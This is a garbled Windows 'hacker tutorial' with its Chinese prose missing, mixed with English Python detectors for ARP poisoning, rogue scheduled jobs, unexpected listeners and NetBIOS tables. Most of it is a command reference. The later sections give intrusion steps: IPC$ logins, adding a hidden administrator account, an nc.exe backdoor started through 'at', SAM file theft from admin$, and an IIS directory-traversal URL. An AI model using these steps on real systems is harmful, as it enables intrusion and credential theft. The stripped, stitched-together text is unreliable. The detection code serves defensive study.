Hacker Tutorial
Cracker Hacker
rfc
IP
1
2
3
4
5
ftppingnet
tcp/ip
C asp cgi
htm
phpjava
C htm
wuftpApache
QQ QQ
3windows
4 CMD ASP PHP JAVA
5 BBS X
6
7
8 QQ
9
10
()
1 IPC
windows
2 windows ,windows
3basic ,,
4 (, ),
sql NBSI.
,,
windows
,.
........ ,
2000 (),
,
().
,., Di~~~
,....:
,, blog,,,(
),.
.
: ( :windows2000 ,VPN
,windows_HOME XP "" IIS......)
E
3
1:cmd
2cmd
.bat
:cmd,
IPC$
cmd
cmd
cmd and
cmd "/?" ping ping /?
google
google
pass:^_^
Enjoy it !
4
DOS
dir deltree cls cd
copy diskcopy del format
edit mem md move
more type rd sys DOS
ren xcopy chkdsk attrib
ctty emm386
:
Dir
? **
*.
., dir *.exe
dir .exe
/p
/w
5
/s
win
Attrib
attrib
+r
-r
+a
-a
+s
-s
+h
-h
Cls
Exit
format
/q
/q
Ipconfig
TCP/IP (DHCP)
(DNS) ipconfig IP
/all
TCP/IP
ipconfig
IP
TCP/IP DHCP IP (APIPA)
md
Move
Nbtstat
TCP/IP (NetBT) NetBIOS
NetBIOS
-A IPAddress
NetBIOS IP
Netstat
TCP IP IPv4
Ping
(ICMP)
TCP/IP
IP
Ping TCP/IP
ping Ip
-t
ping
CTRL-BREAK ping CTRL-C
-lSize
32size 65,527
Rename (Ren)
Shutdown
shutdown
-m ComputerName
-t xx
xx 20
-l
-m ComputerName
-s
-r
-a
-l ComputerName
-a
System File Checker (sfc)
win
/scannow
/scanonce
/purgecache
Windows
/cachesize=x
Windows MB
type
type
bat
Tree
Xcopy
/s
/sxcopy
/e
copy
del
1.
ping 192.168.10.88 -t
2.DNSIPMac
A.Win98winipcfg
B.Win2000 Ipconfig/all
C.NSLOOKUP DNS
C:\>nslookup
Default Server: ns.hesjptt.net.cn
Address: 202.99.160.68
>server 202.99.41.2 DNS 41.2
> pop.pcpop.com
Server: ns.hesjptt.net.cn
Address: 202.99.160.68
Non-authoritative answer:
Name: pop.pcpop.com
Address: 202.99.160.212
3.
Net send
/IP|* ()
net stop messenger
net start messenger
4.
ping a IP t NetBios
nbtstat -a 192.168.10.146
5.netstat -a
netstat -s -e TCPUDPICMP IP
6. arp
IP MAC
arp -a
7.
IP MAC IP
arp -s 192.168.10.59 00-50-ff-6c-08-75
IP MAC
arp -d IP
8.
net config server /hidden:yes
net config server /hidden:no
9. net
A. net view
IP
C:\>net view 192.168.10.8
192.168.10.8
------------------------------------- Disk
B. net user
C. net use
net use z: \\192.168.10.8\movie IP movie
Z
D. net session
C:\>net session
Computer               User name            Client Type       Opens Idle time
-------------------------------------------------------------------------------
\\192.168.10.110       ROME                 Windows 2000 2195 0     00:03:12
\\192.168.10.51        ROME                 Windows 2000 2195 0     00:00:39
10.
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 325S
11.
A. net share
B.
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
$
C.
c:\net share mymovie=e:\downloads\movie /users:1
mymovie
1
12. DOS IP
A. IP
CMD
netsh
netsh>int
interface>ip
interface ip>set add "" static IP mask gateway
B.IP
interface ip>show address
Arp
" (ARP)" ARP
IP
arp
arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]
InetAddr
arp -a
InetAddr IP
ARP -N IfaceAddr
IfaceAddr
IP -N
-g [InetAddr] [-N IfaceAddr]
-a
-d InetAddr [IfaceAddr]
IP InetAddr IP
IfaceAddr
IfaceAddr IP
(*) InetAddr
-s InetAddr EtherAddr [IfaceAddr]
ARP IP InetAddr EtherAddr
ARP IfaceAddr
IfaceAddr IP
/?
InetAddr IfaceAddr IP
EtherAddr
00-AA-00-4F-2A-9C
-s ARP
TCP/IP ARP
arp
""
(TCP/IP)
ARP
arp -a
IP 10.0.0.99 ARP
arp -a -N 10.0.0.99
IP 10.0.0.80 00-AA-00-4F-2A-9C ARP
arp -s 10.0.0.80 00-AA-00-4F-2A-9C
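The two ARP passages above (items 6-7 and the full `arp` reference) describe reading the cache with `arp -a`, pinning a host with `arp -s`, and clearing an entry with `arp -d`. The following is an added example, not code from the original tutorial: it parses the text `arp -a` prints on an English Windows host, reports any MAC address that is claimed by more than one IP (the trace ARP poisoning leaves behind), and confirms that a pinned entry really is static. The sample output and every address in it are constructed.

```python
"""Parse Windows ``arp -a`` output and flag ARP-cache anomalies.

Added example for this page, not code from the original tutorial. The
sample output below is constructed (illustrative addresses and MACs).
"""
import re
from collections import defaultdict

# Constructed `arp -a` output, not captured from a real host. The default
# gateway 10.0.0.1 and the host 10.0.0.80 resolve to the same MAC, the
# classic trace an ARP-poisoning attack leaves behind in the cache.
SAMPLE_ARP_OUTPUT = """\
Interface: 10.0.0.99 --- 0x3
  Internet Address      Physical Address      Type
  10.0.0.1              00-aa-00-4f-2a-9c     dynamic
  10.0.0.80             00-aa-00-4f-2a-9c     dynamic
  10.0.0.120            00-0c-29-11-22-33     dynamic
  10.0.0.200            00-50-ff-6c-08-75     static
"""

IFACE_RE = re.compile(r"^Interface:\s+(\d{1,3}(?:\.\d{1,3}){3})\s+---\s+(0x[0-9a-fA-F]+)")
ENTRY_RE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"            # IPv4 address
    r"([0-9a-fA-F]{2}(?:-[0-9a-fA-F]{2}){5})\s+"  # MAC in Windows dash notation
    r"(dynamic|static)\s*$",                       # entry type
    re.IGNORECASE,
)


def parse_arp(text):
    """Return (interface_ip, ip, mac, type) tuples; MAC and type lower-cased."""
    entries = []
    iface = None
    for line in text.splitlines():
        m = IFACE_RE.match(line)
        if m:
            iface = m.group(1)
            continue
        m = ENTRY_RE.match(line)
        if m and iface is not None:
            ip, mac, kind = m.groups()
            entries.append((iface, ip, mac.lower(), kind.lower()))
    return entries


def find_duplicate_macs(entries):
    """Map every MAC claimed by more than one IP to the list of those IPs.

    Two IPs sharing one MAC on the same interface is either a multi-homed
    host or, far more often, a poisoned entry: the attacker's MAC has been
    written over the gateway's (or another victim's) address.
    """
    by_mac = defaultdict(list)
    for _iface, ip, mac, _kind in entries:
        by_mac[mac].append(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


def check_static_entry(entries, ip, expected_mac):
    """True if `ip` is present as a *static* entry carrying `expected_mac`.

    Run after `arp -s ip mac` to confirm the pin took effect: a dynamic
    entry for the gateway can still be overwritten by a spoofed reply.
    """
    for _iface, entry_ip, mac, kind in entries:
        if entry_ip == ip:
            return kind == "static" and mac == expected_mac.lower()
    return False


if __name__ == "__main__":
    parsed = parse_arp(SAMPLE_ARP_OUTPUT)
    for mac, ips in find_duplicate_macs(parsed).items():
        print("MAC %s is claimed by %s" % (mac, ", ".join(ips)))
    print("10.0.0.200 pinned:", check_static_entry(parsed, "10.0.0.200", "00-50-FF-6C-08-75"))
```

On a live host, feed `parse_arp` the captured text of `arp -a` instead of the sample. A duplicate MAC on the gateway's entry is the cue to pin it with `arp -s` and to look for the poisoning host by the MAC; note that on Windows 2000/XP a static entry does not survive a reboot, so the pin must be re-applied at startup.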
13.At
at
" "
at
[[\\ComputerName]
hours:minutes
[/interactive]
[{/every:date[,...]|/next:date[,...]}] command]
\\computername
at
ID
/delete
ID
/yes
""
hours:minutes
24
00:00 [] 23:59 :
/interactive
command , command
/every:
command
date
MTWThFSSu 1 31
date at
/next:
command
command
Windows
(UNC)
/?
Schtasks at
schtasks at
schtasks "
"
at
at Administrators
Cmd.exe
At Cmd.exe
(.exe) Cmd.exe
cmd /c dir > c:\test.out
at
Status ID   Day                     Time          Command Line
-------------------------------------------------------------------------------
   OK   1   Each F                  4:30 PM       net send group leads status due
   OK   2   Each M                  12:00 AM      chkstor > check.file
   OK   3   Each F                  11:59 PM      backup2.bat
(ID)
(ID) at
Task ID1
Status:OK
Schedule:Each F
Time of Day:4:30 PM
Command:net send group leads status due at
at
"
"
at
(>)
at
(^) Output.text
systemroot
at
at at
" "
" "
UNC
at 1:00pm my_backup \\server\share
x: ?
at 1:00pm my_backup x:
at
at
Marketing
at \\marketing
Corp 3
at \\corp 3
8:00 Corp
Maintenance Corp.txt Reports
at \\corp 08:00 cmd /c "net share reports=d:\marketing\reports
>> \\maintenance\reports\corp.txt"
Marketing
Archive.cmd
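The `at` reference above shows the listing a bare `at` prints (Status, ID, Day, Time, Command Line), and the later section on `at` shows the same scheduler being used to start nc.exe on a compromised host. The following is an added example, not code from the original tutorial: it parses that listing and flags jobs whose command line matches a few indicators a reviewer would look for. The listing is constructed in the page's column layout (jobs 1-3 are the page's own rows; jobs 4-5 are constructed), and the indicator list is an assumption, not an exhaustive signature set.

```python
"""Parse the listing printed by a bare ``at`` and flag suspicious jobs.

Added example, not code from the original tutorial. The listing below is
constructed in the column layout the page shows; the indicator patterns
are an assumption of what a reviewer would look for, not a complete list.
"""
import re

# Constructed `at` listing. Jobs 1-3 are the page's own examples; jobs 4
# and 5 are the kind of persistence the tutorial's "at ... nc.exe" and
# "net user ... /add" commands leave behind on a compromised host.
SAMPLE_AT_LISTING = """\
Status ID   Day                     Time          Command Line
-------------------------------------------------------------------------------
        1   Each F                  4:30 PM       net send group leads status due
        2   Each M                  12:00 AM      chkstor > check.file
        3   Each F                  11:59 PM      backup2.bat
        4   Today                   12:30 PM      c:\\winnt\\system32\\nc.exe -l -p 99 -e cmd.exe
ERROR   5   Tomorrow                1:00 AM       cmd /c "net user heibai lovechina /add"
"""

# status (blank means OK), id, day spec, time, command line
ROW_RE = re.compile(
    r"^\s*(OK|ERROR)?\s*(\d+)\s+(.*?)\s+(\d{1,2}:\d{2}\s*[AP]M)\s+(.+?)\s*$"
)

# Indicator patterns (assumed, not exhaustive) and the reason reported.
SUSPICIOUS = [
    (re.compile(r"\bnc(?:\.exe)?\b", re.I), "netcat listener/backdoor"),
    (re.compile(r"\bnet\s+(?:user|localgroup)\b", re.I), "account or group manipulation"),
    (re.compile(r"\btftp\b|\bftp\s+-s:", re.I), "scripted file transfer"),
    (re.compile(r">\s*\\\\", re.I), "output redirected to a UNC share"),
]


def parse_at_listing(text):
    """Return one dict per scheduled job; header and rule lines are skipped."""
    jobs = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            status, job_id, day, time, command = m.groups()
            jobs.append({"status": status or "OK", "id": int(job_id),
                         "day": day.strip(), "time": time, "command": command})
    return jobs


def flag_suspicious(jobs):
    """Return {job_id: [reasons]} for every job whose command matches an indicator."""
    flagged = {}
    for job in jobs:
        reasons = [label for pattern, label in SUSPICIOUS if pattern.search(job["command"])]
        if reasons:
            flagged[job["id"]] = reasons
    return flagged


if __name__ == "__main__":
    jobs = parse_at_listing(SAMPLE_AT_LISTING)
    for job_id, reasons in flag_suspicious(jobs).items():
        print("job %d: %s" % (job_id, "; ".join(reasons)))
```

A flagged job is removed with `at <id> /delete`; because `at` jobs run as SYSTEM and `at \\computer` lists a remote machine's scheduler, the same parser works on the listing taken from each host in turn.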
rsh
Host
command
-l UserName
-n
rsh NULL
Command
/?
rsh command
command
command Rsh
">
>"
"RemoteFile""LocalFile"
rsh othercomputer cat remotefile >> localfile
Remotefile otherremotefile
rsh othercomputer cat remotefile ">>" otherremotefile
rsh
Windows XP Professional
rsh
.rhosts
.rhosts UNIX
.rhosts
.rhosts
rcprexec rsh
.rhosts
(#)
host7 #This computer is in room 31A
.rhosts
.rhosts
(TCP/IP)
admin1
vax1 telcon
rsh vax1 -l admin1 telcon
15.Tftp
(TFTP) daemon
UNIX (TFTP) daemon
UNIX
-i
-i
ASCII (EOL)
Host
put
Destination Source
TFTP
get
Destination Source
Source
Destination
Destination Source
/?
get
FileTwo
FileOne put FileTwo
FileOne get
Windows XP Windows 2000 TFTP Windows
2000 TFTP Windows XP Windows 2000
(TCP/IP)
Users.txt vax1
Users19.txt
tftp vax1 put users.txt users19.txt
16.Nbtstat
TCP/IP (NetBT) NetBIOS
nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [Interval]
-a remotename
NetBIOS RemoteName
NetBIOS NetBIOS
NetBIOS
-A IPAddress
NetBIOS IP
-c
NetBIOS NetBIOS
-n
NetBIOS Registered
WINS
-r
NetBIOS WINS Windows XP
WINS
-R
NetBIOS Lmhosts
#PRE
-RR
WINS NetBIOS
-s
NetBIOS IP
-S
NetBIOS IP
Interval
Interval
CTRL+C netstat
/?
Nbtstat
Nbtstat
Input
Output
In/Out
Lift
Local Name NetBIOS
Remote Host IP
<03> NetBIOS NetBIOS
16
<20>
ASCII
Type
Status NetBIOS ""
""
State NetBIOS
NetBIOS
IP
IP
TCP
(TCP/IP)
NetBIOS
CORP07
NetBIOS
nbtstat -a CORP07
IP 10.0.0.99
NetBIOS
nbtstat -A 10.0.0.99
NetBIOS
nbtstat -n
NetBIOS
nbtstat -c
NetBIOS Lmhosts
#PRE
nbtstat -R
WINS NetBIOS
nbtstat -RR
5 IP NetBIOS
nbtstat -S 5
17.Netstat
TCP IP IPv4
netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]
-a
TCP TCP UDP
-e
-s
-n
TCP
-o
TCP
ID (PID) Windows
"
"
PID -a-n -p
-p Protocol
Protocol Protocol
tcpudptcpv6 udpv6 -s
Protocol tcpudpicmpiptcpv6udpv6icmpv6 ipv6
-s
TCP UDPICMP IP
Windows XP IPv6
IPv6
-p
-r
IP route print
Interval
Interval CTRL+C
netstat
/?
(-) (/)
Netstat
Proto
TCP UDP
Local Address
IP -n IP
*
Foreign Address
IP -n
IP *
(state)
TCP
CLOSE_WAIT
CLOSED
ESTABLISHED
FIN_WAIT_1
FIN_WAIT_2
LAST_ACK
LISTEN
SYN_RECEIVED
SYN_SEND
TIMED_WAIT
TCP RFC 793
(TCP/IP)
netstat -e -s
TCP UDP
netstat -s -p tcp udp
5 TCP
ID
netstat -o 5
TCP
ID
netstat -n -o
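The `netstat` reference above ends with `netstat -o`, which adds the owning process ID to each connection. The following is an added example, not code from the original tutorial: it parses `netstat -ano` output, lists the TCP ports the host is listening on together with their PIDs, and reports any listener outside a baseline, including the remote peers already connected to it. It is the check a defender runs against the kind of listener the tutorial's later `at ... nc.exe` / `telnet 127.0.0.1 99` section sets up. The output, PIDs and peer addresses are constructed, and the baseline port set is an assumption for a plain file server.

```python
"""Parse Windows ``netstat -ano`` output and report unexpected listeners.

Added example, not code from the original tutorial. The output below is
constructed (illustrative PIDs and peers). ``-o`` is the Windows XP/2003
switch that appends the owning PID; the page's ``netstat -a`` prints the
same table without that column. The baseline port set is an assumption
for a plain Windows file server and must be adjusted per host.
"""
import re

SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       776
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:99             0.0.0.0:0              LISTENING       1488
  TCP    10.1.1.94:139          0.0.0.0:0              LISTENING       4
  TCP    10.1.1.94:445          10.1.1.110:1054        ESTABLISHED     4
  TCP    10.1.1.94:99           192.0.2.7:3391         ESTABLISHED     1488
  UDP    0.0.0.0:445            *:*                                    4
  UDP    10.1.1.94:137          *:*                                    4
"""

TCP_STATES = ("LISTENING|ESTABLISHED|TIME_WAIT|CLOSE_WAIT|SYN_SENT|SYN_RECEIVED|"
              "FIN_WAIT_1|FIN_WAIT_2|LAST_ACK|CLOSING|CLOSED")
ROW_RE = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)"   # proto, local ip:port, foreign
    r"(?:\s+(" + TCP_STATES + r"))?"         # state column (absent for UDP)
    r"\s+(\d+)\s*$"                          # owning PID
)

BASELINE_TCP_PORTS = {135, 139, 445}  # assumption: RPC endpoint mapper + SMB only


def parse_netstat(text):
    """Return one dict per connection row; header lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            proto, lip, lport, foreign, state, pid = m.groups()
            rows.append({"proto": proto, "local_ip": lip, "local_port": int(lport),
                         "foreign": foreign, "state": state or "", "pid": int(pid)})
    return rows


def tcp_listeners(rows):
    """Map each listening TCP port to the PID that owns the socket."""
    return {r["local_port"]: r["pid"] for r in rows
            if r["proto"] == "TCP" and r["state"] == "LISTENING"}


def unexpected_listeners(rows, expected_ports=BASELINE_TCP_PORTS):
    """Listening TCP ports outside the baseline, with owner PID and live peers.

    A shell bound by nc.exe (the page's port 99) shows up here together
    with the PID to pass to `tasklist /fi "PID eq <pid>"` and the remote
    addresses already connected to it.
    """
    findings = []
    for port, pid in sorted(tcp_listeners(rows).items()):
        if port in expected_ports:
            continue
        peers = sorted(r["foreign"] for r in rows
                       if r["proto"] == "TCP" and r["local_port"] == port
                       and r["state"] == "ESTABLISHED")
        findings.append({"port": port, "pid": pid, "peers": peers})
    return findings


if __name__ == "__main__":
    for f in unexpected_listeners(parse_netstat(SAMPLE_NETSTAT)):
        print("port %(port)d owned by PID %(pid)d, peers: %(peers)s" % f)
```

The PID is the pivot: `tasklist /fi "PID eq 1488"` names the image, and `tasklist /svc` tells you whether it is hosted by a service. On Windows 2000 `netstat` has no `-o`, so the PID column is absent there and the port-to-process mapping needs a separate tool.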
18.Runas
runas
[{/profile|/noprofile}]
[/env]
[/netonly]
[/smartcard]
/profile
/profile
/noprofile
/noprofile
/env
/netonly
/smartcard
/smartcard
/showtrustlevels
/trustlevel
/trustlevel
/showtrustlevels
/user:UserAccountName
user@domain domain\user
/user
/?
runas
runas "
"
runas Administrator Administrator
runas MMC
"
"
Administrator /user:
/user:AdministratorAccountName@ComputerName
/user:ComputerName\AdministratorAccountName
/user:AdministratorAccountName@DomainName
/user:DomainName\AdministratorAccountName
runas (*.exe) MMC (*.msc) MMC
"
""Users""Power Users"
"
MMC "
".
runas
"
"
RunAs RunAs
"
"
""""
Windows 2000
companydomain\domainadmin "
"
runas /user:companydomain\domainadmin "mmc
%windir%\system32\compmgmt.msc"
MMC
19.Route
IP route
route
[-f]
[-p]
[Command
[Destination]
[mask
Netmask]
-f
255.255.255.255
127.0.0.0 255.255.255.0
224.0.0.0 240.0.0.0
addchange delete
-p
add TCP/IP
IP TCP/IP print
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Par
ameters\PersistentRoutes
Command
add
change
delete
print
Destination
IP
0 IP
0.0.0.0
mask subnetmask
IP 255.255.255.255
0.0.0.0 255.255.255.255
0 1
Gateway
IP IP
IP
metric Metric
1 ~ 9999
if Interface
route print
0x if
/?
TCP/IP LAN IP
LAN
TCP/IP
systemroot\System32\Drivers\Etc
Destination"" (DNS)
IP
Gateway DNS systemroot\System32\Drivers\Etc
NetBIOS
print delete Gateway
Destination (*) (*)
(?)
10.*.1, 192.168.* 127.* *224*
"Route:bad
gateway address netmask" 1
1 0
1
Windows NT 4.0Windows 2000Windows Millennium Edition
Windows XP route -p
(TCP/IP)
IP
route print
IP
10.
route print 10.*
192.168.12.1
route add 0.0.0.0 mask 0.0.0.0 192.168.12.1
10.41.0.0 255.255.0.0
10.27.0.1
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1
10.41.0.0 255.255.0.0
10.27.0.1
route -p add 10.41.0.0 mask 255.255.0.0 10.27.0.1
10.41.0.0 255.255.0.0
10.27.0.1
7
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 metric 7
10.41.0.0 255.255.0.0
10.27.0.1 0x3
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 if 0x3
10.41.0.0 255.255.0.0
route delete 10.41.0.0 mask 255.255.0.0
IP
10.
route delete 10.*
10.41.0.0 255.255.0.0
10.27.0.1 10.27.0.25
route change 10.41.0.0 mask 255.255.0.0 10.27.0.25
Changing a Windows server's IP address from the command line (Windows 2000/2003 Server)
Server
ip
Windows2000
Unix ip
C:\>ipconfig (ipconfig ip )
Windows 2000 IP Configuration
Ethernet adapter :
Connection-specific DNS Suffix .:
IP Address............: 10.1.1.94 ip
Subnet Mask ...........: 255.255.255.0
Default Gateway .........: 10.1.1.254
C:\>netsh
netsh>interface
interface>ip
interface ip>set address " " static 10.1.1.111 255.255.255.0 10.1.1.254
interface ip>exit
set :
set address - IP
set dns - DNS
set wins - WINS
IPCONFIG
C:\>ipconfig ipconfig
,
Windows 2000 IP Configuration
Ethernet adapter :
Connection-specific DNS Suffix .
IP Address............: 10.1.1.111
Subnet Mask ...........: 255.255.255.0
Default Gateway .........: 10.1.1.254
..-
? -
aaaa - `aaaa'
abort -
add -
alias -
bye -
commit -
delete -
dhcp - `dhcp'
dump -
exec -
exit -
help -
interface - `interface'
offline -
online -
popd -
pushd -
quit -
ras - `ras'
routing - `routing'
set -
show -
unalias -
wins - `wins'
IP
IP Win2000 IP Win98
IP
IP
?
Win2000 netsh
" "
"cmd" netsh
netsh
int ip
IP dump IP
netsh IP 192.168.0.7
255.255.255.0
C:\Documents and Settings\Administrator>netsh
netsh>int ip
interface ip>set address name=" " source=static addr=192.168.0.7 mask=255.255.255.0
interface ip>exit
ipconfig
C:\Documents and Settings\Administrator>ipconfig
Windows 2000 IP Configuration
Ethernet adapter 2
Media State ........... Cable Disconnected
Ethernet adapter
Connection-specific DNS Suffix .
IP Address............ 192.168.0.7
Subnet Mask ........... 255.255.255.0
Default Gateway ......... 192.168.0.2
Win2000
IP IP
int ip
set address name=" " source=static addr=192.168.0.7 mask=255.255.255.0
"7.sh" C C
"netsh exec 7.sh" ? ipconfig
IP
IP
"addr" IP
172.19.96.7
IP
int ip
set address name=" " source=static addr=172.19.96.7 mask=255.255.255.0
set address name=" " gateway=172.19.96.1 gwmetric=1
ipconfig/all
IP ?
netstat
netstat TCP/IP netstat -a
netstat -r netstat -e
Ethernet
netstat -s netstat -n
Tracert IP
Tracert IP (TTL) ICMP
-d IP
-h maximum_hops target_name
-j host-list Tracert
-w timeout timeout
target_name IP
pathping
ping tracert
pathping
-n Hostnames
-h Maximum hops
-g Host-list
-p Period ping
-q Num_queries
-w Time-out
-T Layer 2 tag 2 IEEE 802.1p
2
-T
(QoS)
DHCP
netsh
netsh>(Netshell) "dhcp"
dhcp> DHCP
server \\servername server ip_address
" servername
"
DHCP Netshell
/? help
Netshell
route
routing ip add/delete/set/show interface
IP
routing ip add/delete/set/show filter
IP
routing ip add/delete/show boundary
routing ip nat add/delete addressmapping NAT
IGMP
routing ip ospf add/delete/set/show virtif
OSPF
routing ip ospf add/delete/show neighbor
OSPF
routing ip ospf add/delete/show protofilter
OSPF
routing ip ospf add/delete/show routefilter
OSPF
routing ip ospf show areastats OSPF
IPX netsh
routing ipx add/set staticroute IPX IPX
routing ipx add/set staticservice SAP SAP
dump WINS
add name add name /?
add partner add partner /?
add pngserver Persona Non Grata
add pngserver /?
check database check
database /?
check name WINS
check name /?
check version check
version /?
delete name
delete name /?
delete partner
delete partner /?
delete records
delete records /?
delete owners delete
owners /?
delete pngserver Persona Non Grata
delete pngserver /?
init backup WINS init backup /?
init import Lmhosts init import /?
init pull "" WINS
init pull /?
init pullrange WINS
init pullrange /?
init push "" WINS
init push /?
init replicate init
replicate /?
init restore init restore /?
init scavenge WINS init
scavenge /?
init search WINS init search /?
reset statistics reset
statistics /?
set autopartnerconfig
set autopartnerconfig /?
set backuppath set
backuppath /?
set burstparam set
autopartnerconfig /?
set logparam set
logparam /?
set migrateflag set
migrateflag /?
set namerecord set
namerecord /?
set periodicdbchecking
set periodicdbchecking /?
set pullpartnerconfig ""
set pullpartnerconfig /?
set pushpartnerconfig ""
set pushpartnerconfig /?
set pullparam " " set
pullparam /?
set pushparam " " set
pushparam /?
set replicateflag set
replicateflag /?
set startversion ID set
startversion /?
show browser [1Bh]
show browser /?
show database
show database /?
show info show info /?
show name show
name /?
show partner """"
""
show partner /?
show partnerproperties show
partnerproperties /?
show pullpartnerconfig ""
show pullpartnerconfig /?
show pushpartnerconfig ""
show pushpartnerconfig /?
show reccount
show reccount /?
show recbyversion
show recbyversion /?
show server show server /?
show statistics WINS show
statistics /?
show version WINS
show version /?
show versionmap ID ""
show versionmap /?
Interface
interface set/show interface
1NET
IP IPC$
hbx 123456 IP 127.0.0.1
net use \\127.0.0.1\ipc$ 123456 /user:hbx null
lovechina
net user heibai lovechina /add
Administrator
.
net localgroup Administrators heibai /add
\* C .
C \* Z .
net use z: \\127.0.0.1\c$
net start telnet
TELNET .
Guest
guest NT
2000
net user guest /active:yes( :
guest )
net user guest /active:no guest
guest lovechina
net user
/delete ,,
, net
localgroup
administrators , administrator
net user
administrator
del................
2:at
AT
ID=1
at \\127.0.0.1 12:3 nc.exe
NC.EXE.
NCNC NETCAT .
TELNET
99.
12:3
99
..
at ,
:
C:\> AT 22:30 Start C:\prettyboy.mp3
ID = 1 [
22:30
]
3:telnet
.
telnet 127.0.0.1 99
99
.
.
4:FTP
, FTP ,
,, WWW.51.NET,.,,
FTP .
FTP WWW.51.NET,
HUCJS,
654321
ftpwww.51.net
,.
---------------------, INDEX.HTM, C:\, D:\
get c:\index.htm d:\
C INDEX.HTM,
D
put c:\index.htm d:\
5:copy
IPC$
C index.htm 127.0.0.1 C
copy index.htm \\127.0.0.1\c$\index.htm
D C D
copy index.htm \\127.0.0.1\d$\index.htm
WINNT
admin$ winnt
NT
x:\winnt\repair\sam._ sam._
127.0.0.1 C
copy \\127.0.0.1\admin$\repair\sam._ c:\
6set
80 SET
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST= IP IP
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0 IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT
100% DIR
XX.XX.XX.XX/ XX.XX.XX.XX
7nbtstat
NT: ports 137-139 (NetBIOS over TCP/IP)
NT
nbtstat -A XX.XX.XX.XX
-A
net use \\ IP
net view \\ IP
net use X: \\IP\ \* X
139
netstat -n
----------------
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
PENTIUMII      <00>  UNIQUE      Registered
PENTIUMII      <20>  UNIQUE      Registered
ORAHOTOWN      <00>  GROUP       Registered
ORAHOTOWN      <1C>  GROUP       Registered
ORAHOTOWN      <1B>  UNIQUE      Registered
PENTIUMII      <03>  UNIQUE      Registered
INet~Services  <1C>  GROUP       Registered
IS~PENTIUMII...<00>  UNIQUE      Registered
ORAHOTOWN      <1E>  GROUP       Registered
ORAHOTOWN      <1D>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered

MAC Address = 00-E0-29-14-35-BA
<03> .
PENTIUMII
03 :MAC IP
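Both the `nbtstat` reference (item 16) and this section read the same artefact: the NetBIOS name table that `nbtstat -A <ip>` returns over UDP 137. The following is an added example, not code from the original tutorial: it parses that table, annotates each row with the standard meaning of its suffix, and summarizes what the table gives away (computer name, domain, whether shares are served, whether the host is a domain controller or master browser, logged-on user names from `<03>` entries, and the MAC). The embedded table is the one the page prints for PENTIUMII/ORAHOTOWN, re-laid out in the standard column format.

```python
"""Decode the NetBIOS name table printed by ``nbtstat -A <ip>``.

Added example, not code from the original tutorial. The sample table is
the one the page prints for host PENTIUMII in domain ORAHOTOWN (re-laid
out in the standard column format); the suffix meanings are the standard
NetBIOS name-suffix assignments.
"""
import re

SAMPLE_NBTSTAT = """\
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
PENTIUMII      <00>  UNIQUE      Registered
PENTIUMII      <20>  UNIQUE      Registered
ORAHOTOWN      <00>  GROUP       Registered
ORAHOTOWN      <1C>  GROUP       Registered
ORAHOTOWN      <1B>  UNIQUE      Registered
PENTIUMII      <03>  UNIQUE      Registered
INet~Services  <1C>  GROUP       Registered
IS~PENTIUMII...<00>  UNIQUE      Registered
ORAHOTOWN      <1E>  GROUP       Registered
ORAHOTOWN      <1D>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered

MAC Address = 00-E0-29-14-35-BA
"""

# (suffix, type) -> meaning, from the standard NetBIOS suffix table
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "workstation service (computer name)",
    ("00", "GROUP"): "domain or workgroup name",
    ("03", "UNIQUE"): "messenger service (computer name or logged-on user)",
    ("20", "UNIQUE"): "file server service (shares reachable over SMB)",
    ("1B", "UNIQUE"): "domain master browser (PDC)",
    ("1C", "GROUP"): "domain controllers",
    ("1D", "UNIQUE"): "master browser",
    ("1E", "GROUP"): "browser service elections",
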